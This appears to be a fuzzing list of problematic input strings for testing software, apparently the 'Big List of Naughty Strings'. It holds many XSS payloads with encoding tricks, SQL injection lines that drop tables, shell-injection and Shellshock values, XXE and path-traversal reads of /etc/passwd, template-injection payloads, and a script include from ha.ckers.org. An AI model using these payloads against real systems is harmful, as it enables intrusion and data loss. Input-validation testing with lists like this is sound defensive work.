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\\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--1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,./;'[]\-= | &lt;&gt;?:"{}|_+ | !@#$%^&amp;*()`~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`⁄€‹›ﬁﬂ‡°·‚—±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“” | ‘"’ | “''''"'” | “'"'"''''” | &lt;foo val=“bar” /&gt; | &lt;foo val=“bar” /&gt; | &lt;foo val=”bar“ /&gt; | &lt;foo val=`bar'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“&gt;&lt;script&gt;alert(4)&lt;/script&gt;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“;alert(15);t=” | ‘;alert(16);t=’ | JavaSCript:alert(17) | ;alert(18); | src=JaVaSCript:prompt(19) | “&gt;&lt;script&gt;alert(20);&lt;/script x=” | ‘&gt;&lt;script&gt;alert(21);&lt;/script x=’ | &gt;&lt;script&gt;alert(22);&lt;/script x= | " autofocus onkeyup=“javascript:alert(23) | ' autofocus onkeyup='javascript:alert(24) | &lt;script\x20type=“text/javascript”&gt;javascript:alert(25);&lt;/script&gt; | &lt;script\x3Etype=“text/javascript”&gt;javascript:alert(26);&lt;/script&gt; | &lt;script\x0Dtype=“text/javascript”&gt;javascript:alert(27);&lt;/script&gt; | &lt;script\x09type=“text/javascript”&gt;javascript:alert(28);&lt;/script&gt; | &lt;script\x0Ctype=“text/javascript”&gt;javascript:alert(29);&lt;/script&gt; | &lt;script\x2Ftype=“text/javascript”&gt;javascript:alert(30);&lt;/script&gt; | &lt;script\x0Atype=“text/javascript”&gt;javascript:alert(31);&lt;/script&gt; | '`"&gt;&lt;\x3Cscript&gt;javascript:alert(32)&lt;/script&gt; | '`"&gt;&lt;\x00script&gt;javascript:alert(33)&lt;/script&gt; | ABC&lt;div style=“x\x3Aexpression(javascript:alert(34)"&gt;DEF | ABC&lt;div style=“x:expression\x5C(javascript:alert(35)"&gt;DEF | ABC&lt;div style=“x:expression\x00(javascript:alert(36)"&gt;DEF | ABC&lt;div style=“x:exp\x00ression(javascript:alert(37)"&gt;DEF | ABC&lt;div style=“x:exp\x5Cression(javascript:alert(38)"&gt;DEF | ABC&lt;div style=“x:\x0Aexpression(javascript:alert(39)"&gt;DEF | ABC&lt;div style=“x:\x09expression(javascript:alert(40)"&gt;DEF | ABC&lt;div style=“x:\xE3\x80\x80expression(javascript:alert(41)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x84expression(javascript:alert(42)"&gt;DEF | ABC&lt;div style=“x:\xC2\xA0expression(javascript:alert(43)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x80expression(javascript:alert(44)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x8Aexpression(javascript:alert(45)"&gt;DEF | ABC&lt;div style=“x:\x0Dexpression(javascript:alert(46)"&gt;DEF | ABC&lt;div style=“x:\x0Cexpression(javascript:alert(47)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x87expression(javascript:alert(48)"&gt;DEF | ABC&lt;div style=“x:\xEF\xBB\xBFexpression(javascript:alert(49)"&gt;DEF | ABC&lt;div style=“x:\x20expression(javascript:alert(50)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x88expression(javascript:alert(51)"&gt;DEF | ABC&lt;div style=“x:\x00expression(javascript:alert(52)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x8Bexpression(javascript:alert(53)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x86expression(javascript:alert(54)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x85expression(javascript:alert(55)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x82expression(javascript:alert(56)"&gt;DEF | ABC&lt;div style=“x:\x0Bexpression(javascript:alert(57)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x81expression(javascript:alert(58)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x83expression(javascript:alert(59)"&gt;DEF | ABC&lt;div style=“x:\xE2\x80\x89expression(javascript:alert(60)"&gt;DEF | &lt;a href="\x0Bjavascript:javascript:alert(61)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x0Fjavascript:javascript:alert(62)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xC2\xA0javascript:javascript:alert(63)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x05javascript:javascript:alert(64)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE1\xA0\x8Ejavascript:javascript:alert(65)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x18javascript:javascript:alert(66)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x11javascript:javascript:alert(67)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x88javascript:javascript:alert(68)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x89javascript:javascript:alert(69)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x80javascript:javascript:alert(70)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x17javascript:javascript:alert(71)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x03javascript:javascript:alert(72)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x0Ejavascript:javascript:alert(73)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x1Ajavascript:javascript:alert(74)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x00javascript:javascript:alert(75)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x10javascript:javascript:alert(76)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x82javascript:javascript:alert(77)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x20javascript:javascript:alert(78)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x13javascript:javascript:alert(79)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x09javascript:javascript:alert(80)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x8Ajavascript:javascript:alert(81)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x14javascript:javascript:alert(82)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x19javascript:javascript:alert(83)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\xAFjavascript:javascript:alert(84)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x1Fjavascript:javascript:alert(85)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x81javascript:javascript:alert(86)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x1Djavascript:javascript:alert(87)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x87javascript:javascript:alert(88)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x07javascript:javascript:alert(89)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE1\x9A\x80javascript:javascript:alert(90)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x83javascript:javascript:alert(91)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x04javascript:javascript:alert(92)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x01javascript:javascript:alert(93)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x08javascript:javascript:alert(94)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x84javascript:javascript:alert(95)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x86javascript:javascript:alert(96)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE3\x80\x80javascript:javascript:alert(97)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x12javascript:javascript:alert(98)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x0Djavascript:javascript:alert(99)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x0Ajavascript:javascript:alert(100)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x0Cjavascript:javascript:alert(101)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x15javascript:javascript:alert(102)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\xA8javascript:javascript:alert(103)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x16javascript:javascript:alert(104)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x02javascript:javascript:alert(105)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x1Bjavascript:javascript:alert(106)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x06javascript:javascript:alert(107)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\xA9javascript:javascript:alert(108)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x85javascript:javascript:alert(109)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x1Ejavascript:javascript:alert(110)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\xE2\x81\x9Fjavascript:javascript:alert(111)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href="\x1Cjavascript:javascript:alert(112)" id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href=“javascript\x00:javascript:alert(113)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href=“javascript\x3A:javascript:alert(114)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href=“javascript\x09:javascript:alert(115)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href=“javascript\x0D:javascript:alert(116)” id=“fuzzelement1”&gt;test&lt;/a&gt; | &lt;a href=“javascript\x0A:javascript:alert(117)” id=“fuzzelement1”&gt;test&lt;/a&gt; | `"'&gt;&lt;img src=xxx:x \x0Aonerror=javascript:alert(118)&gt; | `"'&gt;&lt;img src=xxx:x \x22onerror=javascript:alert(119)&gt; | `"'&gt;&lt;img src=xxx:x \x0Bonerror=javascript:alert(120)&gt; | `"'&gt;&lt;img src=xxx:x \x0Donerror=javascript:alert(121)&gt; | `"'&gt;&lt;img src=xxx:x \x2Fonerror=javascript:alert(122)&gt; | `"'&gt;&lt;img src=xxx:x \x09onerror=javascript:alert(123)&gt; | `"'&gt;&lt;img src=xxx:x \x0Conerror=javascript:alert(124)&gt; | `"'&gt;&lt;img src=xxx:x \x00onerror=javascript:alert(125)&gt; | `"'&gt;&lt;img src=xxx:x \x27onerror=javascript:alert(126)&gt; | `"'&gt;&lt;img src=xxx:x \x20onerror=javascript:alert(127)&gt; | "`'&gt;&lt;script&gt;\x3Bjavascript:alert(128)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x0Djavascript:alert(129)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xEF\xBB\xBFjavascript:alert(130)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x81javascript:alert(131)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x84javascript:alert(132)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE3\x80\x80javascript:alert(133)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x09javascript:alert(134)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x89javascript:alert(135)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x85javascript:alert(136)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x88javascript:alert(137)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x00javascript:alert(138)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\xA8javascript:alert(139)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x8Ajavascript:alert(140)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE1\x9A\x80javascript:alert(141)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x0Cjavascript:alert(142)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x2Bjavascript:alert(143)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xF0\x90\x96\x9Ajavascript:alert(144)&lt;/script&gt; | "`'&gt;&lt;script&gt;-javascript:alert(145)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x0Ajavascript:alert(146)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\xAFjavascript:alert(147)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x7Ejavascript:alert(148)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x87javascript:alert(149)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x81\x9Fjavascript:alert(150)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\xA9javascript:alert(151)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xC2\x85javascript:alert(152)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xEF\xBF\xAEjavascript:alert(153)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x83javascript:alert(154)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x8Bjavascript:alert(155)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xEF\xBF\xBEjavascript:alert(156)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x80javascript:alert(157)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x21javascript:alert(158)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x82javascript:alert(159)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE2\x80\x86javascript:alert(160)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xE1\xA0\x8Ejavascript:alert(161)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x0Bjavascript:alert(162)&lt;/script&gt; | "`'&gt;&lt;script&gt;\x20javascript:alert(163)&lt;/script&gt; | "`'&gt;&lt;script&gt;\xC2\xA0javascript:alert(164)&lt;/script&gt;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src=x\x13onerror=“javascript:alert(191)"&gt; | &lt;img[a][b][c]src[d]=x[e]onerror=[f]“alert(192)"&gt;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src=“x` `&lt;script&gt;javascript:alert(200)&lt;/script&gt;"` `&gt; | &lt;img src onerror /” '"= alt=javascript:alert(201)//"&gt; | &lt;title onpropertychange=javascript:alert(202)&gt;&lt;/title&gt;&lt;title title=&gt; | &lt;a href=http://foo.bar/#x=`y&gt;&lt;/a&gt;&lt;img alt="`&gt;&lt;img src=x:x onerror=javascript:alert(203)&gt;&lt;/a&gt;"&gt; | &lt;!--[if]&gt;&lt;script&gt;javascript:alert(204)&lt;/script --&gt; | &lt;!--[if&lt;img src=x onerror=javascript:alert(205)//]&gt; --&gt; | &lt;script src="/\%(jscript)s”&gt;&lt;/script&gt; | &lt;script src="\\%(jscript)s”&gt;&lt;/script&gt; | &lt;IMG """&gt;&lt;SCRIPT&gt;alert(“206”)&lt;/SCRIPT&gt;"&gt; | &lt;IMG SRC=javascript:alert(String.fromCharCode(50,48,55))&gt; | &lt;IMG SRC=# onmouseover="alert(‘208’)"&gt; | &lt;IMG SRC= onmouseover="alert(‘209’)"&gt; | &lt;IMG onmouseover="alert(‘210’)"&gt;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ascript:alert(‘214’);"&gt; | &lt;IMG SRC="jav&amp;#x09;ascript:alert(‘215’);"&gt; | &lt;IMG SRC="jav&amp;#x0A;ascript:alert(‘216’);"&gt; | &lt;IMG SRC=“jav&amp;#x0D;ascript:alert(‘217’);"&gt; | perl -e ‘print "&lt;IMG SRC=java\0script:alert(\"218\")&gt;";’ &gt; out | &lt;IMG SRC=” &amp;#14;  javascript:alert(‘219’);"&gt; | &lt;SCRIPT/XSS SRC=“http://ha.ckers.org/xss.js”&gt;&lt;/SCRIPT&gt; | &lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(“220”)&gt; | &lt;SCRIPT/SRC=“http://ha.ckers.org/xss.js”&gt;&lt;/SCRIPT&gt; | &lt;&lt;SCRIPT&gt;alert(“221”);//&lt;&lt;/SCRIPT&gt; | &lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt; B &gt; | &lt;SCRIPT SRC=//ha.ckers.org/.j&gt; | &lt;IMG SRC=“javascript:alert(‘222’)” | &lt;iframe src=http://ha.ckers.org/scriptlet.html &lt; | \";alert(‘223’);// | &lt;u oncopy=alert()&gt; Copy me&lt;/u&gt; | &lt;i onwheel=alert(224)&gt; Scroll over me &lt;/i&gt; | &lt;plaintext&gt; | http://a/%%30%30 | &lt;/textarea&gt;&lt;script&gt;alert(225)&lt;/script&gt; | 1;DROP TABLE users | 1'; DROP TABLE users-- 1 | ' OR 1=1 -- 1 | ' OR ‘1’='1 | '; EXEC sp_MSForEachTable 'DROP TABLE ?'; -- |   | % | _ | - | -- | --version | --help | $USER | /dev/null; touch /tmp/blns.fail ; echo | `touch /tmp/blns.fail` | $(touch /tmp/blns.fail) | @{[system “touch /tmp/blns.fail”]} | eval("puts ‘hello world’") | System("ls -al /") | `ls -al /` | Kernel.exec("ls -al /") | Kernel.exit(1) | %x(‘ls -al /') | &lt;?xml version=“1.0” encoding=“ISO-8859-1”?&gt;&lt;!DOCTYPE foo [ &lt;!ELEMENT foo ANY &gt;&lt;!ENTITY xxe SYSTEM “file:///etc/passwd” &gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt; | $HOME | $ENV{‘HOME’} | %d | %s%s%s%s%s | {0} | %*.*s | %@ | %n | File:/// | ../../../../../../../../../../../etc/passwd%00 | ../../../../../../../../../../../etc/hosts | () { 0; }; touch /tmp/blns.shellshock1.fail; | () { _; } &gt;_[$($())] { touch /tmp/blns.shellshock2.fail; } | &lt;&lt;&lt; %s(un='%s’)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[0;31mred[0m, violets are [0;34mblue. Hope you enjoy terminal hue | But now...[20Cfor my greatest trick...[8m | The quick brown fox... [Beeeep] | Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗 | 🏳0🌈️ | జ్ఞ‌ా | گچپژ | {% print ‘x’ * 64 * 1024**3 %} | {{ “".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd”).read()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,./;'[]\-=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&lt;&gt;?:"{}|_+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!@#$%^&amp;*()`~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‘"’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“''''"'”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“'"'"''''”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val=“bar”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val=“bar”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val=”bar“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val=`bar'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__ﾛ(,_,*)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・(￣∀￣)・:*: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,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’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¯\_(ツ)_/¯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&lt;script&gt;alert(0)&lt;/script&gt;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&amp;lt;script&amp;gt;alert(&amp;#39;1&amp;#39;);&amp;lt;/script&amp;gt;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onerror=alert(2)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&lt;svg&gt;&lt;script&gt;123&lt;1&gt;alert(3)&lt;/script&gt;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"&gt;&lt;script&gt;alert(4)&lt;/script&gt;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'&gt;&lt;script&gt;alert(5)&lt;/script&gt;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&gt;&lt;script&gt;alert(6)&lt;/script&gt;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&lt;/script&gt;&lt;script&gt;alert(7)&lt;/script&gt;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&lt;sc&lt;script&gt;ript&gt;alert(13)&lt;/sc&lt;/script&gt;ript&gt;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--&gt;&lt;script&gt;alert(14)&lt;/script&gt;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“;alert(15);t=”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‘;alert(16);t=’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“&gt;&lt;script&gt;alert(20);&lt;/script x=”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‘&gt;&lt;script&gt;alert(21);&lt;/script x=’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&gt;&lt;script&gt;alert(22);&lt;/script x=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onkeyup="javascript:alert(23)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onkeyup='javascript:alert(24)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&lt;script\x20type=“text/javascript”&gt;javascript:alert(25);&lt;/script&gt;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&lt;script\x3Etype=“text/javascript”&gt;javascript:alert(26);&lt;/script&gt;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&lt;script\x0Dtype=“text/javascript”&gt;javascript:alert(27);&lt;/script&gt;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&lt;script\x09type=“text/javascript”&gt;javascript:alert(28);&lt;/script&gt;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&lt;script\x0Ctype=“text/javascript”&gt;javascript:alert(29);&lt;/script&gt;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&lt;script\x2Ftype=“text/javascript”&gt;javascript:alert(30);&lt;/script&gt;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&lt;script\x0Atype=“text/javascript”&gt;javascript:alert(31);&lt;/script&gt;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'`"&gt;&lt;\x3Cscript&gt;javascript:alert(32)&lt;/script&gt;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'`"&gt;&lt;\x00script&gt;javascript:alert(33)&lt;/script&gt;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style="x\x3Aexpression(javascript:alert(34)"&gt;DEF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style="x:expression\x5C(javascript:alert(35)"&gt;DEF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style="x:expression\x00(javascript:alert(36)"&gt;DEF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style="x:exp\x00ression(javascript:alert(37)"&gt;DEF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style="x:exp\x5Cression(javascript:alert(38)"&gt;DEF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style="x:\x0Aexpression(javascript:alert(39)"&gt;DEF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style="x:\x09expression(javascript:alert(40)"&gt;DEF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style="x:\xE3\x80\x80expression(javascript:alert(41)"&gt;DEF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style="x:\xE2\x80\x84expression(javascript:alert(42)"&gt;DEF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style="x:\xC2\xA0expression(javascript:alert(43)"&gt;DEF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style="x:\xE2\x80\x80expression(javascript:alert(44)"&gt;DEF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style="x:\xE2\x80\x8Aexpression(javascript:alert(45)"&gt;DEF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style="x:\x0Dexpression(javascript:alert(46)"&gt;DEF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style="x:\x0Cexpression(javascript:alert(47)"&gt;DEF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style="x:\xE2\x80\x87expression(javascript:alert(48)"&gt;DEF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style="x:\xEF\xBB\xBFexpression(javascript:alert(49)"&gt;DEF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style="x:\x20expression(javascript:alert(50)"&gt;DEF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style="x:\xE2\x80\x88expression(javascript:alert(51)"&gt;DEF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style="x:\x00expression(javascript:alert(52)"&gt;DEF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style="x:\xE2\x80\x8Bexpression(javascript:alert(53)"&gt;DEF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style="x:\xE2\x80\x86expression(javascript:alert(54)"&gt;DEF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style="x:\xE2\x80\x85expression(javascript:alert(55)"&gt;DEF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style="x:\xE2\x80\x82expression(javascript:alert(56)"&gt;DEF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style="x:\x0Bexpression(javascript:alert(57)"&gt;DEF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style="x:\xE2\x80\x81expression(javascript:alert(58)"&gt;DEF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style="x:\xE2\x80\x83expression(javascript:alert(59)"&gt;DEF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style="x:\xE2\x80\x89expression(javascript:alert(60)"&gt;DEF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href=“javascript\x00:javascript:alert(113)”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href=“javascript\x3A:javascript:alert(114)”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href=“javascript\x09:javascript:alert(115)”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href=“javascript\x0D:javascript:alert(116)”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href=“javascript\x0A:javascript:alert(117)”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"`'&gt;&lt;script&gt;\x3Bjavascript:alert(128)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x0Djavascript:alert(129)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xEF\xBB\xBFjavascript:alert(130)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x81javascript:alert(131)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x84javascript:alert(132)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE3\x80\x80javascript:alert(133)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x09javascript:alert(134)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x89javascript:alert(135)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x85javascript:alert(136)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x88javascript:alert(137)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x00javascript:alert(138)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\xA8javascript:alert(139)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x8Ajavascript:alert(140)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE1\x9A\x80javascript:alert(141)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x0Cjavascript:alert(142)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x2Bjavascript:alert(143)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xF0\x90\x96\x9Ajavascript:alert(144)&lt;/script&gt;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"`'&gt;&lt;script&gt;-javascript:alert(145)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x0Ajavascript:alert(146)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\xAFjavascript:alert(147)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x7Ejavascript:alert(148)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x87javascript:alert(149)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x81\x9Fjavascript:alert(150)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\xA9javascript:alert(151)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xC2\x85javascript:alert(152)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xEF\xBF\xAEjavascript:alert(153)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x83javascript:alert(154)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x8Bjavascript:alert(155)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xEF\xBF\xBEjavascript:alert(156)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x80javascript:alert(157)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x21javascript:alert(158)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x82javascript:alert(159)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE2\x80\x86javascript:alert(160)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xE1\xA0\x8Ejavascript:alert(161)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x0Bjavascript:alert(162)&lt;/script&gt;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"`'&gt;&lt;script&gt;\x20javascript:alert(163)&lt;/script&gt;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"`'&gt;&lt;script&gt;\xC2\xA0javascript:alert(164)&lt;/script&gt;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onerror="javascript:alert(167)"&gt;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onerror="javascript:alert(168)"&gt;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onerror="javascript:alert(170)"&gt;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onerror="javascript:alert(171)"&gt;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onerror="javascript:alert(172)"&gt;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onerror="javascript:alert(174)"&gt;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onerror="javascript:alert(176)"&gt;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onerror="javascript:alert(177)"&gt;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onerror="javascript:alert(179)"&gt;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onerror="javascript:alert(180)"&gt;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onerror="javascript:alert(181)"&gt;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onerror="javascript:alert(182)"&gt;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onerror="javascript:alert(183)"&gt;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onerror="javascript:alert(184)"&gt;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onerror="javascript:alert(185)"&gt;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onerror="javascript:alert(186)"&gt;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src=x\x09onerror="javascript:alert(187)"&gt;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src=x\x10onerror="javascript:alert(188)"&gt;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src=x\x11onerror="javascript:alert(189)"&gt;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src=x\x12onerror="javascript:alert(190)"&gt;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src=x\x13onerror="javascript:alert(191)"&gt;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&lt;img[a][b][c]src[d]=x[e]onerror=[f]"alert(192)"&gt;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href=java&amp;#1&amp;#2&amp;#3&amp;#4&amp;#5&amp;#6&amp;#7&amp;#8&amp;#11&amp;#12script:javascript:alert(199)&gt;XXX&lt;/a&gt;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src="x` `&lt;script&gt;javascript:alert(200)&lt;/script&gt;"` `&gt;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/" '"= alt=javascript:alert(201)//"&gt;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&lt;title onpropertychange=javascript:alert(202)&gt;&lt;/title&gt;&lt;title title=&gt;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href=http://foo.bar/#x=`y&gt;&lt;/a&gt;&lt;img alt="`&gt;&lt;img src=x:x onerror=javascript:alert(203)&gt;&lt;/a&gt;"&gt;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&lt;!--[if]&gt;&lt;script&gt;javascript:alert(204)&lt;/script --&gt;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&lt;!--[if&lt;img src=x onerror=javascript:alert(205)//]&gt; --&gt;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 src="/\%(jscript)s"&gt;&lt;/script&gt;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 src="\\%(jscript)s"&gt;&lt;/script&gt;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"""&gt;&lt;SCRIPT&gt;alert(“206”)&lt;/SCRIPT&gt;"&gt;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SRC=javascript:alert(String.fromCharCode(50,48,55))&gt;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SRC=# onmouseover="alert(‘208’)"&gt;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onmouseover="alert(‘209’)"&gt;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onmouseover="alert(‘210’)"&gt;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SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#50;&amp;#49;&amp;#49;&amp;#39;&amp;#41;&gt;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SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x32&amp;#x31&amp;#x33&amp;#x27&amp;#x29&gt;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SRC="jav   ascript:alert(‘214’);"&gt;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SRC="jav&amp;#x09;ascript:alert(‘215’);"&gt;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SRC="jav&amp;#x0A;ascript:alert(‘216’);"&gt;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SRC="jav&amp;#x0D;ascript:alert(‘217’);"&gt;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perl -e ‘print "&lt;IMG SRC=java\0script:alert(\"218\")&gt;";’ &gt; out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 &amp;#14;  javascript:alert(‘219’);"&gt;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&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(“220”)&gt;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&lt;&lt;SCRIPT&gt;alert(“221”);//&lt;&lt;/SCRIPT&gt;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 SRC=http://ha.ckers.org/xss.js?&lt; B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 SRC=//ha.ckers.org/.j&gt;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SRC=“javascript:alert(‘222’)”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&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;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\";alert(‘223’);//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&lt;u oncopy=alert()&gt; Copy me&lt;/u&gt;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 onwheel=alert(224)&gt; Scroll over me &lt;/i&gt;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&lt;plaintext&gt;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&lt;/textarea&gt;&lt;script&gt;alert(225)&lt;/script&gt;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1'; DROP TABLE users-- 1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1=1 -- 1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‘1’='1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'; EXEC sp_MSForEachTable 'DROP TABLE ?'; --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--version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--help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`touch /tmp/blns.fail`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@{[system “touch /tmp/blns.fail”]}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eval("puts ‘hello world’")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System("ls -al /")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`ls -al /`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Kernel.exec("ls -al /")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%x('ls -al /')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&lt;?xml version=“1.0” encoding=“ISO-8859-1”?&gt;&lt;!DOCTYPE foo [ &lt;!ELEMENT foo ANY &gt;&lt;!ENTITY xxe SYSTEM “file:///etc/passwd” 